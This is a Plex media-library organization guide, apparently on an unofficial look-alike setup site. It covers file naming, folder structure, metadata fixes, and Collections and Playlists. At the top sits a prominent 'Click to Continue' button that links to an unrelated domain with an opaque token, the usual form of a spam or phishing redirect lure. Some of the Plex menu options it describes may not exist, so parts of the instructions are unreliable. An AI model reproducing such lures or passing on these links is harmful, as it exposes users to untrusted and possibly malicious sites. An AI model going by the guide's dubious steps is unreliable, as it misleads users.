> ## Documentation Index
> Fetch the complete documentation index at: https://plextv-setup.mintlify.site/llms.txt
> Use this file to discover all available pages before exploring further.

# How to Organize Your Plex Media Library Like a Pro

> Master Plex file naming conventions, metadata agents, Collections, and Playlists to build a perfectly organized media library that looks great on every device.

<div style="text-align:center; margin:30px 0;">
  <a
    href="https://flosyr.com/?6oI8GsDJtzJ2vdj7p62PpblRRZN8BvA8cKLiI6knkje8c1 "
    style="
display:inline-flex;
align-items:center;
justify-content:center;
gap:10px;
padding:14px 28px;
background:linear-gradient(135deg,#007bff,#0056d6);
color:#ffffff;
text-decoration:none;
font-family:Arial,sans-serif;
font-size:17px;
font-weight:700;
border-radius:50px;
box-shadow:0 5px 15px rgba(0,123,255,0.35);
transition:all 0.3s ease;
"
  >
    <span>Click to Continue</span>
    <span style="font-size:22px; line-height:1;">→</span>
  </a>
</div>

A Plex library is only as good as the files behind it. Throw a folder of randomly named video files at Plex and you'll get a confusing, poorly-matched mess of posters and metadata. Organize those same files with the right naming conventions and a clear folder structure, and Plex transforms them into a beautiful, browsable library that rivals any commercial streaming service. This guide walks you through everything — from the correct way to name a movie file to fixing stubborn mismatches and building curated Collections — so your library looks perfect on every device.

## Step 1: Set Up Your Folder Structure

Before you add anything to Plex, get your folder structure right. Plex expects each library type to have its own root folder, and it works best when movies and TV shows are stored separately.

<Steps>
  <Step title="Create separate root folders for each media type">
    Use a dedicated top-level folder for each library category:

    ```text theme={null}
    /media/
    ├── Movies/
    ├── TV Shows/
    ├── Music/
    └── Photos/
    ```

    Never mix movies and TV episodes in the same folder — Plex's metadata agents rely on the library type to determine how to scan and match content.
  </Step>

  <Step title="Name movie files and folders correctly">
    Plex expects movies in the format: **Movie Title (Year)**. Each movie should live in its own subfolder:

    ```text theme={null}
    Movies/
    ├── The Dark Knight (2008)/
    │   └── The Dark Knight (2008).mkv
    ├── Inception (2010)/
    │   └── Inception (2010).mkv
    └── Everything Everywhere All at Once (2022)/
        └── Everything Everywhere All at Once (2022).mkv
    ```

    Including the year is critical — it helps Plex disambiguate remakes and films with identical titles.
  </Step>

  <Step title="Name TV show files and folders correctly">
    TV shows require a two-level folder structure — show folder, then season subfolder — with episode files named using the **SxxExx** format:

    ```text theme={null}
    TV Shows/
    └── Breaking Bad (2008)/
        ├── Season 01/
        │   ├── Breaking Bad (2008) - S01E01 - Pilot.mkv
        │   └── Breaking Bad (2008) - S01E02 - Cat's in the Bag.mkv
        └── Season 02/
            └── Breaking Bad (2008) - S02E01 - Seven Thirty-Seven.mkv
    ```

    The show year in the folder name is optional but recommended to avoid ambiguity with remakes.
  </Step>

  <Step title="Name music files correctly">
    Plex reads music metadata from embedded ID3 tags rather than filenames, but a clean folder structure still helps:

    ```text theme={null}
    Music/
    └── Artist Name/
        └── Album Name (Year)/
            ├── 01 - Track Title.flac
            └── 02 - Track Title.flac
    ```

    Use a tool like **MusicBrainz Picard** to embed accurate tags before adding music to Plex.
  </Step>
</Steps>

<Tip>
  Use **FileBot** or **tinyMediaManager** to rename large batches of files automatically using their correct titles. Both tools query TheMovieDB and TheTVDB and rename files to Plex's preferred format in seconds.
</Tip>

## Step 2: Add Library Sections in Plex

With your folders organized, add them to Plex as distinct library sections.

<Steps>
  <Step title="Open Plex Media Server settings">
    In Plex Web, click the **+** icon next to **Libraries** in the left sidebar, or navigate to **Settings → Libraries → Add Library**.
  </Step>

  <Step title="Choose the library type">
    Select from **Movies**, **TV Shows**, **Music**, **Photos**, or **Home Videos**. Each type uses a different metadata agent and display layout, so matching the type to your content is essential.
  </Step>

  <Step title="Add your media folder">
    Click **Browse for media folder** and navigate to your root media folder (e.g., `/media/Movies`). You can add multiple folders to a single library — useful if you have media spread across multiple drives.
  </Step>

  <Step title="Configure the language and agent settings">
    Before saving, verify that the language is set to your preferred language for metadata. Leave the agent on the default (Plex Movie / Plex TV Series) unless you have a specific reason to change it.
  </Step>

  <Step title="Click Add Library and let Plex scan">
    Plex will scan your folder, match each file to a title in its database, and fetch posters, backdrops, descriptions, cast information, and ratings. For a large library this can take several minutes — leave it running in the background.
  </Step>
</Steps>

<Note>
  Plex's default metadata agent uses data from TheMovieDB (movies), TheTVDB and TheMovieDB (TV shows), and MusicBrainz (music). These are generally excellent sources, but you can also install community agents via the Plugin directory for specialty content like anime or Asian cinema.
</Note>

## Step 3: Fix Mismatched Metadata

Even with perfect naming, Plex occasionally matches the wrong film or episode. Here's how to correct it.

<Steps>
  <Step title="Identify mismatched items">
    Browse your library and look for wrong posters, missing artwork, or incorrect descriptions. Items with a spinning refresh icon are still being matched.
  </Step>

  <Step title="Right-click and choose Fix Incorrect Match">
    In Plex Web, right-click (or long-press on mobile) any mismatched item and select **Fix Incorrect Match**. Plex will show you alternative results from its database — select the correct one.
  </Step>

  <Step title="Use Fix Incorrect Audio/Subtitle Tracks if needed">
    If audio tracks or subtitle languages are labeled incorrectly, right-click the item and choose **Fix Incorrect Audio/Subtitle Tracks** to re-analyze the file.
  </Step>

  <Step title="Manually match by ID if the title doesn't appear">
    For obscure or foreign titles, click **Search by name or ID** and paste in the TheMovieDB or TheTVDB ID directly. You can find IDs in the URL on those sites (e.g., `themoviedb.org/movie/12345`).
  </Step>
</Steps>

<Tip>
  After bulk-renaming a folder or adding a large batch of files, trigger a manual library scan via **Settings → Troubleshooting → Clean Bundles** and then **Fix Library Issues**. This removes stale metadata and forces a clean re-match.
</Tip>

## Step 4: Customize Artwork and Metadata

Plex automatically fetches artwork, but you can swap in your own.

<Steps>
  <Step title="Upload custom poster art">
    Right-click any library item and choose **Edit**. Under the **Poster** tab, click the **+** icon to upload a custom image. Your custom poster takes priority over Plex's auto-fetched art.
  </Step>

  <Step title="Use the Community Rating or your own ratings">
    In the same edit panel, you can override audience and critic ratings, edit the summary text, add studio information, and correct the content rating. These changes are stored locally and survive metadata refreshes.
  </Step>

  <Step title="Lock metadata to prevent overwrites">
    Once you've manually edited an item's metadata, click the **lock** icon in the edit panel to pin those fields. Locked fields are never overwritten by automatic metadata refreshes.
  </Step>
</Steps>

## Step 5: Build Collections and Playlists

Once your library is clean, Collections and Playlists are what turn a good library into a great one.

<Steps>
  <Step title="Create a Collection">
    Collections group related movies or shows together — franchises, director filmographies, holiday picks, whatever you like. Right-click any movie, choose **Edit**, and type a name in the **Collections** field. Add the same collection name to every title in the group, and Plex displays them together as a browsable collection tile.
  </Step>

  <Step title="Enable Collection Mode">
    In your library settings, toggle **Show collections and their items** to control whether individual movies appear alongside their collection tile or only inside it.
  </Step>

  <Step title="Create a Playlist">
    Playlists are ordered queues of any mix of content — great for movie marathons, curated watch lists, or kid-friendly queues. Click **New Playlist** in the left sidebar, give it a name, and drag in any items from your library.
  </Step>

  <Step title="Share Playlists with household members">
    With Plex Pass, you can share playlists with other members of your Plex Home so the whole family sees your curated queues.
  </Step>
</Steps>

***

## Common Organization Questions

<Accordion title="What do I do with multi-edition movies (Theatrical vs. Director's Cut)?">
  Plex supports multiple editions of the same movie stored in a single folder. Name each file with the edition in curly braces:

  ```text theme={null}
  Blade Runner 2049 (2017)/
  ├── Blade Runner 2049 (2017) {edition-Theatrical Cut}.mkv
  └── Blade Runner 2049 (2017) {edition-Director's Cut}.mkv
  ```

  Plex groups them under a single library tile with an **Editions** selector.
</Accordion>

<Accordion title="How do I handle specials and bonus content for TV shows?">
  Store specials in a **Season 00** folder. Plex maps these to TheTVDB's "Specials" season:

  ```text theme={null}
  The Office (2005)/
  └── Season 00/
      └── The Office (2005) - S00E01 - The Office: An American Workplace.mkv
  ```

  For behind-the-scenes extras, featurettes, and deleted scenes, create a subfolder called `Behind The Scenes`, `Featurettes`, `Deleted Scenes`, `Interviews`, `Scenes`, `Shorts`, or `Trailers` inside the movie folder. Plex recognizes these names automatically.
</Accordion>

<Accordion title="Why does Plex keep losing my custom metadata after a refresh?">
  This happens when metadata fields are unlocked. After editing any field manually, open the edit panel and click the **lock icon** next to each customized field. Locked fields are immune to automatic refreshes. Alternatively, enable **Freeze all metadata** in the item's settings to lock everything at once.
</Accordion>

<Accordion title="How do I clean up duplicates in my library?">
  Navigate to your library, click the **filter** icon, and choose **Duplicates**. Plex lists every title that has more than one file. You can compare file quality (resolution, bitrate, codec) and delete the inferior copy directly from the interface — no need to open a file browser.
</Accordion>

<Accordion title="Can I use Plex with network-attached storage (NAS)?">
  Yes, and it works very well. You have two options: run Plex Media Server directly on the NAS (Synology, QNAP, and most Unraid/TrueNAS setups support this), or run PMS on a separate PC and map your NAS shares as network drives. Running PMS on the NAS is simpler; running it on a dedicated PC gives you more CPU headroom for transcoding.
</Accordion>

***

A well-organized Plex library doesn't require constant maintenance — once you establish the right naming conventions and folder structure, new content slots in automatically. Spend the time upfront to clean up your files, and Plex will reward you with a library that looks polished, stays accurate, and works beautifully on every device in your home.
